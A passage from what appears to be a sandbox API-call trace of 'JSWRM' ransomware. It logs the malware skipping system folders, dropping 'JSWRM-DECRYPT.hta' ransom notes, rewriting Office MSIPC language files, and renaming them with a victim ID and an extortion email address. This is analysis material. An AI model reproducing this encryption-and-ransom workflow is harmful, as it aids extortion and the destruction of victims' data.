lpString2="$RECYCLE.BIN") returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="system volume information") returned 1 [0136.929] lstrcmpiW (lpString1="uk", lpString2="msocache") returned 1 [0136.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\uk\\jswrm-decrypt.hta")) returned 0xffffffff [0136.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\uk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.930] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.930] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.932] CloseHandle (hObject=0x238) returned 1 [0136.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\uk\\jswrm-decrypt.hta")) returned 0x20 [0136.932] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\uk\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48479aaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232240 [0136.932] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.932] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48479aaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.932] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.932] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.932] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48479aaf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48479aaf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48479aaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.933] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.933] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\uk\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\uk\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.934] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22168) returned 1 [0136.934] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.934] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5690, lpOverlapped=0x0) returned 1 [0136.937] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.937] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5690, lpOverlapped=0x0) returned 1 [0136.937] CloseHandle (hObject=0x314) returned 1 [0136.937] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\uk\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\uk\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\uk\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\uk\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.938] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.938] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0136.938] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="vi", cAlternateFileName="")) returned 1 [0136.938] lstrcmpiW (lpString1="vi", lpString2=".") returned 1 [0136.938] lstrcmpiW (lpString1="vi", lpString2="..") returned 1 [0136.938] lstrcmpiW (lpString1="vi", lpString2="...") returned 1 [0136.938] lstrcmpiW (lpString1="vi", lpString2="windows") returned -1 [0136.938] lstrcmpiW (lpString1="vi", lpString2="recovery") returned 1 [0136.938] lstrcmpiW (lpString1="vi", lpString2="perflogs") returned 1 [0136.938] lstrcmpiW (lpString1="vi", lpString2="documents and settings") returned 1 [0136.938] lstrcmpiW (lpString1="vi", lpString2="$RECYCLE.BIN") returned 1 [0136.939] lstrcmpiW (lpString1="vi", lpString2="system volume information") returned 1 [0136.939] lstrcmpiW (lpString1="vi", lpString2="msocache") returned 1 [0136.939] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\vi\\jswrm-decrypt.hta")) returned 0xffffffff [0136.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\vi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.940] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.940] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.941] CloseHandle (hObject=0x238) returned 1 [0136.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\vi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\vi\\jswrm-decrypt.hta")) returned 0x20 [0136.942] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\vi\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48479aaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232240 [0136.942] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.942] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48479aaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.942] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.942] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.942] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48479aaf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48479aaf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4849fcf5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.942] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.942] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.942] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.942] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.942] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.943] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.943] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.943] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.943] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.943] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.943] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.943] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\vi\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\vi\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.944] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23192) returned 1 [0136.944] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.944] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5a90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5a90, lpOverlapped=0x0) returned 1 [0136.947] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.947] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5a90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5a90, lpOverlapped=0x0) returned 1 [0136.947] CloseHandle (hObject=0x314) returned 1 [0136.947] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\vi\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\vi\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\vi\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\vi\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.948] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c46ba0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c46ba0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c46ba0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.948] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0136.948] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0136.948] lstrcmpiW (lpString1="zh-CN", lpString2=".") returned 1 [0136.948] lstrcmpiW (lpString1="zh-CN", lpString2="..") returned 1 [0136.948] lstrcmpiW (lpString1="zh-CN", lpString2="...") returned 1 [0136.948] lstrcmpiW (lpString1="zh-CN", lpString2="windows") returned 1 [0136.948] lstrcmpiW (lpString1="zh-CN", lpString2="recovery") returned 1 [0136.949] lstrcmpiW (lpString1="zh-CN", lpString2="perflogs") returned 1 [0136.949] lstrcmpiW (lpString1="zh-CN", lpString2="documents and settings") returned 1 [0136.949] lstrcmpiW (lpString1="zh-CN", lpString2="$RECYCLE.BIN") returned 1 [0136.949] lstrcmpiW (lpString1="zh-CN", lpString2="system volume information") returned 1 [0136.949] lstrcmpiW (lpString1="zh-CN", lpString2="msocache") returned 1 [0136.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-cn\\jswrm-decrypt.hta")) returned 0xffffffff [0136.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 